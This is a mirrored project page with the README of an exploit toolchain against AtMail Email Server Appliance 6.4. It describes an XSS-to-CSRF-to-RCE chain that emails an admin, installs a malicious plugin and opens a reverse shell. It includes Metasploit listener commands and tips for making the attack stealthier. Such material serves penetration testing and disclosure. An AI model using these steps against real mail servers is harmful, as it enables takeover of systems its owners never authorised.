数字签名>> Atmail-exploit-toolchain>> 返回
项目作者: noraj

项目描述 :
AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS > CSRF > RCE)
高级语言: PHP
项目地址: git://github.com/noraj/Atmail-exploit-toolchain.git
创建时间: 2020-05-03T21:59:51Z
项目社区:https://github.com/noraj/Atmail-exploit-toolchain
开源协议:
下载


AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS > CSRF > RCE)

[PacketStorm] [WLB-2020080010]

Disclaimer: this exploit toolchain was inspired by EDB-ID 20009.

Goal

The goal of this exploit toolchain is to replace EDB-ID 20009.

Pros of this toolchain over EDB-ID 20009 exploit:

  • Simple to use
  • Reusable
  • Dynamically generated payloads
  • Easily editable / hackable
  • Clear code and plugin available

Cons of EDB-ID 20009 exploit:

  • Not customizable (static hardcoded payloads)
  • Complex to use (need to replace many hardcoded values and adapt the code to suite the target environment)
  • Oneshot use (all values hardcoded)
  • The plugin archive tgz is embedded as string (hex chars) so the plugin source code can’t be easily read or modified

Requirements

  • (Optional) Metasploit Framework (msfvenom for reverse shell generation)
  • tar (to generate the plugin archive)
  • ruby (payloads preparation and XSS SMTP delivery)
  • (Optional) A web server to deliver the XSS payload
  • Knowing an Atmail admin email address (only admins can install a plugin)
  • Passive interaction (the admin needs to trigger the email containing the XSS payload on the WebMail and to have a valid administration interface session running)

Install requirements on ArchLinux:

  1. $ sudo pacman -S metasploit tar ruby

How it works

  1. Sending an email to the admin containing a XSS payload
  2. The XSS payload remotely load the JavaScript CSRF
  3. The CSRF install a plugin
  4. When installed the plugin execute a system command: the reverse shell

Exploit files:

  • config.yml contains the toolchain configuration
  • exploit.sh the exploit wrapper that need to be executed
  • xss_mail.rb will send the email containing the XSS to the admin via Atmail SMTP server (unauthenticated).
  • csrf_prepare.rb will prepare the CSRF payload (setting the target and encoding the plugin archive)
  • rce_prepare.rb will prepare the RCE (generating the reverse shell and creating the plugin archive)
  • csrf_plugin.js the prepared CSRF payload
  • noraj/ folder containing the uncompressed plugin architecture

Usage

The exploit toolchain requires only 2 manual steps:

  1. Edit config.yml
  2. Launch exploit.sh

But before launching the attack, a web server need to deliver the JavaScript CSRF file and a reverse shell listener need to be waiting the connection. So the attack will more looks like:

  1. Edit config.yml
  2. Start a HTTP server that will deliver csrf_plugin.js
  3. Start the reverse shell listener
  4. Launch exploit.sh

Example of oneline HTTP server:

  1. $ ruby -run -e httpd . -p 8000

Example of reverse shell listener:

  1. msf5 > use exploit/multi/handler
  2. msf5 exploit(multi/handler) > set payload php/reverse_php
  3. payload => php/reverse_php
  4. msf5 exploit(multi/handler) > set LHOST 1.1.1.1
  5. LHOST => 1.1.1.1
  6. msf5 exploit(multi/handler) > set LPORT 8080
  7. LPORT => 8080
  8. msf5 exploit(multi/handler) > run

Notes

  • The RCE occurs only when the plugin is installed, if the reverse shell connection is lost, re-executing means re-installing the plugin. So the admin only needs to reload his mailbox.
  • Red teamers could enhance the exploit to auto-remove the email once read and to remove the plugin once the reverse shell connection is established: less persistent but more stealth.
  • msfvenom (MSF 5.0) only supports an IP address for LHOST, not a domain.
  • As said in Requirements the admin needs to be connect on both the Webmail and the administration interface.
  • Tested with ruby 2.7.